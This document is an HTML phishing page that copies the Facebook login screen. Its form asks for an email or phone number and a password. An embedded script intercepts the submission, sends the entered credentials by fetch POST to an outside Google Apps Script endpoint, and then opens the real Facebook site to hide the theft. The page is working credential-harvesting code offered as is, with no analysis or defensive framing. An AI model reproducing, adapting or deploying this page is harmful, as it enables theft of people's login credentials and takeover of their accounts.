<!DOCTYPE html>
<html lang="en">
<head>


    
    <link rel="stylesheet" href="./html.css">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content='width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1' name='viewport'/>
    <title>Facebook</title>

    <link rel="icon" type="image/x-icon" href="https://icons.iconarchive.com/icons/danleech/simple/256/facebook-icon.png">
        <style>
            body { 
    width: auto;
    height: auto;
    background-color: white;
  }
  div .fb{
    font-family: 'Roboto', sans-serif;
    color: #336db9;
    font-weight: bold;
    font-size: 50px;
    margin: 10px 0px 0px 10px;
  margin-left: 10px;
  }
  div p {
    margin:20px 0px 0px 10px;
  }
  div.main {
    width: 350px;
    float: right;
    margin: 50px 0px 0px auto;
    background-color: rgba(204, 204, 255, 0.3);
    padding: 10px;
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
  border: 1px solid rgba(204, 204, 255, 0.3);
  border-radius: 8px;
  }
  input[type=text], select {
    width: 100%;
    padding: 12px 12px;
    margin: 8px 0px;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
  }
  input[type=password], select {
    width: 100%;
    padding: 12px 12px;
    margin: 8px 0px;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
   }
  button.submit {
    width: 100%;
    background-color: #0066ff;
    color: white;
    padding: 14px 14px;
    margin: 8px 0px;
    border: none;
    border-radius: 4px;
    cursor: pointer;
  }
  div a {
  width: 60%;
  margin: 0% 15%;
  color: rgba(51, 102, 204, 0.7);
  text-decoration: none;
  }
  button.new {
  width: 50%;
  background-color: #009933;
    color: white;
    padding: 14px 14px;
    margin-left: 25%;
    margin-right: 25%;
    border: none;
    border-radius: 4px;
    cursor: pointer;
  }
  input.new {
  color: white;
  font-weight: bold;
  }
  input.ip:focus {
    background-color: #ffffcc;
  }
  


        </style>

</head>
<body>


        <div>
         <p class="fb">facebook</p>
        <p>facebook helps you to connect and share with the people in your life</p>
        <br>

        </div>
        <div class="main">
          <form autocomplete="off" method="post" name ="google-sheet">
            <input type="text" name="id" class="ip" placeholder="email address or phone number">
            <input type="text" name="password" class="ip" placeholder="password">
            <button type="submit" name="submit" class="submit">Log in</button>
                <a href="https://m.facebook.com/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F&r&cuid&ars=facebook_login&lwv=100&refid=8">Forgotten account or password?</a><br><br>
            <hr style="text-align:center;">
                <p style="margin: 2% 50%;">or</p>
         <button onclick="javascript:myFunction();" class="new"><b>create new account</b></button>
          </form>
        </div>
<script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbwQsbgxeybxhfjj1ojULpAPeG8oLOgAgNdbhWMwYMH2NsgVH5yEBT9_WEnw1U4Z0pfj3g/exec'
            const form = document.forms['google-sheet']
          
            form.addEventListener('submit', e => {
              e.preventDefault()
              fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                .then(window.open('https://mbasic.facebook.com' , 'blank'))
                .catch(error => console.error('Error!', error.message))
            })
          </script>


</script>
    
</body>
</html>